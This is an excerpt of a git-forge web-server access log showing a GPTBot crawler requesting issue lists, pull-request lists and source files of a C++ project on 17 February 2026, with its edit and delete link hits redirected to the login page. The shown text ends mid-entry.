"/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9973] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:19:04:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:04:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:04:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:04:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?project=-1&state=open&type=all" +[17/Feb/2026:19:04:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10140] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:04:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=open&type=all" +[17/Feb/2026:19:04:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9954] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&state=all&type=all" +[17/Feb/2026:19:04:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:04:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11270] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:19:04:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:04:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:04:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:04:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:04:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:04:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:04:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:04:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:04:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=open&type=all" +[17/Feb/2026:19:04:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9960] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?project=-1&state=all&type=all" +[17/Feb/2026:19:04:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:04:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:04:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:04:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:04:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:04:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:04:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:04:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:04:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:04:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:04:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:04:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:04:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:04:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:04:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:04:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:04:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:19:04:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:19:04:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 11413] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old" +[17/Feb/2026:19:04:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:19:04:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:19:04:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:19:04:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:19:04:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11086] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:19:04:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 10148] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&state=all&type=all" +[17/Feb/2026:19:04:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:04:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:04:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:04:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9977] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?project=-1&state=open&type=all" +[17/Feb/2026:19:04:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9969] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&state=all&type=all" +[17/Feb/2026:19:04:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10164] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=oldest&state=open&type=all" +[17/Feb/2026:19:04:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:19:04:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:19:04:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:19:04:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:19:04:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 9876] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:19:04:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/dummy.cpp?display=source" [Client 74.7.227.38] [Length 11432] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:19:04:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 997] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:19:04:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:19:04:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 10451] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 